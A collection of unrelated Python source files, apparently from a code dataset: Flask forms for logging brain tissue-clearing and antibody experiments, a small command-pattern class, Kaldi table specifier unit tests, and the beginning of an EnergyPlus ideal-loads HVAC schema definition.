time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('1xPBS 30 min R@RT')
time_dehydr_pbs_wash1_submit = SubmitField('Update')
dehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_pbs_wash2 = OptionalDateTimeLocalField('2xPBS 30 min R@RT')
time_dehydr_pbs_wash2_submit = SubmitField('Update')
dehydr_pbs_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_pbs_wash3 = OptionalDateTimeLocalField('3xPBS 30 min R@RT')
time_dehydr_pbs_wash3_submit = SubmitField('Update')
dehydr_pbs_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_pbs_wash3_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% H2O2 (30%) in methanol(100%) O/N R@RT (1 part H2O2:5 parts methanol)')
time_dehydr_peroxide_wash1_submit = SubmitField('Update')
dehydr_peroxide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
rehydr_date = OptionalDateField('Rehydration')
rehydr_date_submit = SubmitField('Push date to calendar (optional)')
time_rehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr')
time_rehydr_methanol_100percent_wash1_submit = SubmitField('Update')
rehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_rehydr_methanol_80percent_wash1_submit = SubmitField('Update')
rehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_rehydr_methanol_60percent_wash1_submit = SubmitField('Update')
rehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_rehydr_methanol_40percent_wash1_submit = SubmitField('Update')
rehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_rehydr_methanol_20percent_wash1_submit = SubmitField('Update')
rehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_pbs_wash1 = OptionalDateTimeLocalField('PBS R@RTx1hr')
time_rehydr_pbs_wash1_submit = SubmitField('Update')
rehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_sodium_azide_wash1 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (first hour)')
time_rehydr_sodium_azide_wash1_submit = SubmitField('Update')
rehydr_sodium_azide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_sodium_azide_wash1_notes_submit = SubmitField('Update Notes')
time_rehydr_sodium_azide_wash2 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (second hour)')
time_rehydr_sodium_azide_wash2_submit = SubmitField('Update')
rehydr_sodium_azide_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_sodium_azide_wash2_notes_submit = SubmitField('Update Notes')
time_rehydr_glycine_wash1 = OptionalDateTimeLocalField('20%DMSO/0.3M glycine/0.2% TritonX-100/0.1%sodium azide/1xPBS R@37C for 2 days')
time_rehydr_glycine_wash1_submit = SubmitField('Update')
rehydr_glycine_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
rehydr_glycine_wash1_notes_submit = SubmitField('Update Notes')
wash1_date = OptionalDateField('Wash')
wash1_date_submit = SubmitField('Push date to calendar (optional)')
time_wash1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
time_wash1_start_roomtemp_submit = SubmitField('Update')
wash1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
time_wash1_ptwh_wash1_submit = SubmitField('Update')
wash1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
time_wash1_ptwh_wash2_submit = SubmitField('Update')
wash1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
time_wash1_ptwh_wash3_submit = SubmitField('Update')
wash1_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash3_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
time_wash1_ptwh_wash4_submit = SubmitField('Update')
wash1_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash4_notes_submit = SubmitField('Update Notes')
time_wash1_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
time_wash1_ptwh_wash5_submit = SubmitField('Update')
wash1_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash1_ptwh_wash5_notes_submit = SubmitField('Update Notes')
edu_click_chemistry_date = OptionalDateField('EdU click chemistry')
edu_click_chemistry_date_submit = SubmitField('Push date to calendar (optional)')
wash2_date = OptionalDateField('Wash')
wash2_date_submit = SubmitField('Push date to calendar (optional)')
wash2_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_start_roomtemp_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
time_wash2_ptwh_wash1_submit = SubmitField('Update')
wash2_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash1_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
time_wash2_ptwh_wash2_submit = SubmitField('Update')
wash2_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash2_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
time_wash2_ptwh_wash3_submit = SubmitField('Update')
wash2_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash3_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
time_wash2_ptwh_wash4_submit = SubmitField('Update')
wash2_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash4_notes_submit = SubmitField('Update Notes')
time_wash2_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
time_wash2_ptwh_wash5_submit = SubmitField('Update')
wash2_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
wash2_ptwh_wash5_notes_submit = SubmitField('Update Notes')
clearing_date = OptionalDateField('Clearing')
clearing_date_submit = SubmitField('Push date to calendar (optional)')
time_clearing_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
time_clearing_methanol_20percent_wash1_submit = SubmitField('Update')
clearing_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
time_clearing_methanol_40percent_wash1_submit = SubmitField('Update')
clearing_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
time_clearing_methanol_60percent_wash1_submit = SubmitField('Update')
clearing_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
time_clearing_methanol_80percent_wash1_submit = SubmitField('Update')
clearing_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 1)')
time_clearing_methanol_100percent_wash1_submit = SubmitField('Update')
clearing_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 2)')
time_clearing_methanol_100percent_wash2_submit = SubmitField('Update')
clearing_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
time_clearing_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
clearing_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
time_clearing_dcm_wash1_submit = SubmitField('Update')
clearing_dcm_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
time_clearing_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
time_clearing_dcm_wash2_submit = SubmitField('Update')
clearing_dcm_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dcm_wash2_notes_submit = SubmitField('Update Notes')
time_clearing_dbe = OptionalDateTimeLocalField('100% DBE > hr')
time_clearing_dbe_submit = SubmitField('Update')
clearing_dbe_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_dbe_notes_submit = SubmitField('Update Notes')
time_clearing_new_tubes = OptionalDateTimeLocalField('put brains in new tubes with prepoured 100% DBE no rocking')
time_clearing_new_tubes_submit = SubmitField('Update')
clearing_new_tubes_notes = TextAreaField('Notes',validators=[Length(max=100)])
clearing_new_tubes_notes_submit = SubmitField('Update Notes')
clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
clearing_notes_submit = SubmitField('Update')
submit = SubmitField('Submit')
class experimentalForm(FlaskForm):
""" The form for the experimental clearing """
title = 'experimental'
link_to_clearing_spreadsheet = StringField('Link to clearing spreadsheet:',validators=[DataRequired(),Length(max=500)])
submit = SubmitField('Submit')
class NewAntibodyForm(FlaskForm):
""" The form for entering a new antibody trial
into the antibody history table """
title = 'new antibody form'
date = DateField('Date')
brief_descriptor = StringField('Brief exp description',validators=[InputRequired(),Length(max=128)])
animal_model = StringField('Animal model',validators=[InputRequired(),Length(max=128)])
primary_antibody = StringField('Primary antibody',validators=[InputRequired(),Length(max=128)])
primary_concentration = StringField('Primary concentration used',validators=[InputRequired(),Length(max=128)])
primary_order_info = StringField('Primary order info',validators=[Optional(),Length(max=128)])
secondary_antibody = StringField('Secondary antibody',validators=[InputRequired(),Length(max=128)])
secondary_concentration = StringField('Secondary concentration used',validators=[InputRequired(),Length(max=128)])
secondary_order_info = StringField('Secondary order info',validators=[Optional(),Length(max=128)])
notes = StringField('Comments',validators=[Optional(),Length(max=512)])
submit = SubmitField('Submit')
class EditAntibodyForm(FlaskForm):
""" The form for entering a new antibody trial
into the antibody history table """
title = 'Edit antibody history form'
date = DateField('Date')
brief_descriptor = StringField('Brief exp description',)
animal_model = StringField('Animal model',)
primary_antibody = StringField('Primary antibody',)
primary_concentration = StringField('Primary concentration used',)
primary_order_info = StringField('Primary order info',validators=[Optional(),Length(max=128)])
secondary_antibody = StringField('Secondary antibody',)
secondary_concentration = StringField('Secondary concentration used',)
secondary_order_info = StringField('Secondary order info',validators=[Optional(),Length(max=128)])
notes = TextAreaField('Notes',validators=[Optional(),Length(max=512)])
submit = SubmitField('Submit changes')
| 66.103155
| 151
| 0.822762
| 6,548
| 54,469
| 6.47526
| 0.038332
| 0.136321
| 0.167618
| 0.10566
| 0.944434
| 0.929363
| 0.908208
| 0.898892
| 0.880708
| 0.85717
| 0
| 0.047321
| 0.075089
| 54,469
| 823
| 152
| 66.183475
| 0.79426
| 0.056693
| 0
| 0.761024
| 0
| 0.012802
| 0.170568
| 0.002894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002845
| false
| 0
| 0.007112
| 0
| 0.98293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d955976b5d84d4f204f67c2309a1f956b904be9a
| 240
|
py
|
Python
|
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | 3
|
2020-01-25T08:46:31.000Z
|
2020-05-20T09:44:27.000Z
|
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | null | null | null |
baduk/command/command_types.py
|
sarcoma/Baduk
|
dd99ec81548d56449691db454662f467a840c9d4
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class Command(metaclass=ABCMeta):
@abstractmethod
def execute(self):
pass
class UndoableCommand(Command, metaclass=ABCMeta):
@abstractmethod
def undo(self):
pass
| 15
| 50
| 0.691667
| 24
| 240
| 6.916667
| 0.583333
| 0.379518
| 0.277108
| 0.445783
| 0.481928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.233333
| 240
| 15
| 51
| 16
| 0.902174
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0.222222
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
d969d6d1011201357e53d5d89a9e21021ee88d33
| 6,202
|
py
|
Python
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 916
|
2017-11-22T19:33:36.000Z
|
2022-03-31T11:51:58.000Z
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 268
|
2018-01-16T22:06:45.000Z
|
2022-03-29T03:24:41.000Z
|
tests/util/kaldi-table-test.py
|
mxmpl/pykaldi
|
0570307138c5391cc47b019450d08bcb9686dd98
|
[
"Apache-2.0"
] | 260
|
2018-01-23T18:39:40.000Z
|
2022-03-24T08:17:39.000Z
|
from kaldi.util.table import *
import unittest
class TestKaldiTable(unittest.TestCase):
def testClassifyWspecifier(self):
a = "b,ark:foo|"
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("foo|", ark)
self.assertEqual("", scp)
self.assertTrue(opts.binary)
a = "t,ark:foo|"
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("foo|", ark)
self.assertEqual("", scp)
self.assertFalse(opts.binary)
a = "t,scp:a b c d"
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("", ark)
self.assertEqual("a b c d", scp)
self.assertFalse(opts.binary)
a = "t,ark,scp:a b,c,d"
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
self.assertEqual("a b", ark)
self.assertEqual("c,d", scp)
self.assertFalse(opts.binary)
a = ""
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
a = " t,ark:boo" #leading space not allowed.
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
a = " t,ark:boo"
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
a = "t,ark:boo " #trailing space not allowed.
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.NO_SPECIFIER, ans)
a = "b,ark,scp:," #empty ark, scp fnames valid.
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
self.assertEqual("", ark)
self.assertEqual("", scp)
self.assertTrue(opts.binary)
a = "f,b,ark,scp:," #empty ark, scp fnames valid.
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
self.assertEqual("", ark)
self.assertEqual("", scp)
self.assertTrue(opts.binary)
self.assertTrue(opts.flush)
a = "nf,b,ark,scp:," #empty ark, scp fnames valid.
ans, ark, scp, opts = classify_wspecifier(a)
self.assertEqual(WspecifierType.BOTH_SPECIFIER, ans)
self.assertEqual("", ark)
self.assertEqual("", scp)
self.assertTrue(opts.binary)
self.assertFalse(opts.flush)
def testClassifyRspecifier(self):
a = "ark:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("foo|", fname)
a = "b,ark:foo|" #b, is ignored
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("foo|", fname)
a = "ark,b:foo|" #,b is ignored
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("foo|", fname)
a = "scp,b:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("foo|", fname)
a = "scp,scp,b:foo|"; #invalid as repeated.
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
self.assertEqual("", fname)
a = "ark,scp,b:foo|" #invalid as combined
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
self.assertEqual("", fname)
a = "scp,o:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("foo|", fname)
self.assertTrue(opts.once)
a = "scp,no:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("foo|", fname)
self.assertFalse(opts.once)
a = "s,scp,no:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("foo|", fname)
self.assertFalse(opts.once)
self.assertTrue(opts.sorted)
a = "scp:foo|"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("foo|", fname)
a = "scp:" #empty fname valid
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("", fname)
a = ""
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
a = "scp"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
a = "ark"
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
a = "ark:foo " #trailing space not allowed
ans, fname, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.NO_SPECIFIER, ans)
# Testing it accepts the meaningless t, and b, prefixes
a = "b,scp:a"
ans, b, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("a", b)
a = "t,scp:a"
ans, b, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.SCRIPT_SPECIFIER, ans)
self.assertEqual("a", b)
a = "b,ark:a"
ans, b, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("a", b)
a = "t,ark:a"
ans, b, opts = classify_rspecifier(a)
self.assertEqual(RspecifierType.ARCHIVE_SPECIFIER, ans)
self.assertEqual("a", b)
if __name__ == '__main__':
unittest.main()
| 35.44
| 63
| 0.623831
| 722
| 6,202
| 5.264543
| 0.096953
| 0.232833
| 0.126283
| 0.156275
| 0.900816
| 0.88161
| 0.879505
| 0.861352
| 0.843462
| 0.837674
| 0
| 0
| 0.253789
| 6,202
| 174
| 64
| 35.643678
| 0.821305
| 0.04821
| 0
| 0.726619
| 0
| 0
| 0.057206
| 0
| 0
| 0
| 0
| 0
| 0.517986
| 1
| 0.014388
| false
| 0
| 0.014388
| 0
| 0.035971
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d97d1240e2ddb27e9aea9777dc7f49f1aba9f862
| 436,763
|
py
|
Python
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/zone_hvac_forced_air_units.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "Zone HVAC Forced Air Units"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class ZoneHvacIdealLoadsAirSystem(DataObject):
""" Corresponds to IDD object `ZoneHVAC:IdealLoadsAirSystem`
Ideal system used to calculate loads without modeling a full HVAC system. All that is
required for the ideal system are zone controls, zone equipment configurations, and
the ideal loads system component. This component can be thought of as an ideal unit
that mixes zone air with the specified amount of outdoor air and then adds or removes
heat and moisture at 100% efficiency in order to meet the specified controls. Energy
use is reported as DistrictHeating and DistrictCooling.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'zone supply air node name',
{'name': u'Zone Supply Air Node Name',
'pyname': u'zone_supply_air_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'zone exhaust air node name',
{'name': u'Zone Exhaust Air Node Name',
'pyname': u'zone_exhaust_air_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'maximum heating supply air temperature',
{'name': u'Maximum Heating Supply Air Temperature',
'pyname': u'maximum_heating_supply_air_temperature',
'default': 50.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'maximum<': 100.0,
'unit': u'C'}),
(u'minimum cooling supply air temperature',
{'name': u'Minimum Cooling Supply Air Temperature',
'pyname': u'minimum_cooling_supply_air_temperature',
'default': 13.0,
'minimum>': -100.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'maximum<': 50.0,
'unit': u'C'}),
(u'maximum heating supply air humidity ratio',
{'name': u'Maximum Heating Supply Air Humidity Ratio',
'pyname': u'maximum_heating_supply_air_humidity_ratio',
'default': 0.0156,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'minimum cooling supply air humidity ratio',
{'name': u'Minimum Cooling Supply Air Humidity Ratio',
'pyname': u'minimum_cooling_supply_air_humidity_ratio',
'default': 0.0077,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'heating limit',
{'name': u'Heating Limit',
'pyname': u'heating_limit',
'default': u'NoLimit',
'required-field': False,
'autosizable': False,
'accepted-values': [u'NoLimit',
u'LimitFlowRate',
u'LimitCapacity',
u'LimitFlowRateAndCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'maximum heating air flow rate',
{'name': u'Maximum Heating Air Flow Rate',
'pyname': u'maximum_heating_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'maximum sensible heating capacity',
{'name': u'Maximum Sensible Heating Capacity',
'pyname': u'maximum_sensible_heating_capacity',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'W'}),
(u'cooling limit',
{'name': u'Cooling Limit',
'pyname': u'cooling_limit',
'default': u'NoLimit',
'required-field': False,
'autosizable': False,
'accepted-values': [u'NoLimit',
u'LimitFlowRate',
u'LimitCapacity',
u'LimitFlowRateAndCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'maximum cooling air flow rate',
{'name': u'Maximum Cooling Air Flow Rate',
'pyname': u'maximum_cooling_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm3/s'}),
(u'maximum total cooling capacity',
{'name': u'Maximum Total Cooling Capacity',
'pyname': u'maximum_total_cooling_capacity',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'W'}),
(u'heating availability schedule name',
{'name': u'Heating Availability Schedule Name',
'pyname': u'heating_availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling availability schedule name',
{'name': u'Cooling Availability Schedule Name',
'pyname': u'cooling_availability_schedule_name',
'required-field': False,
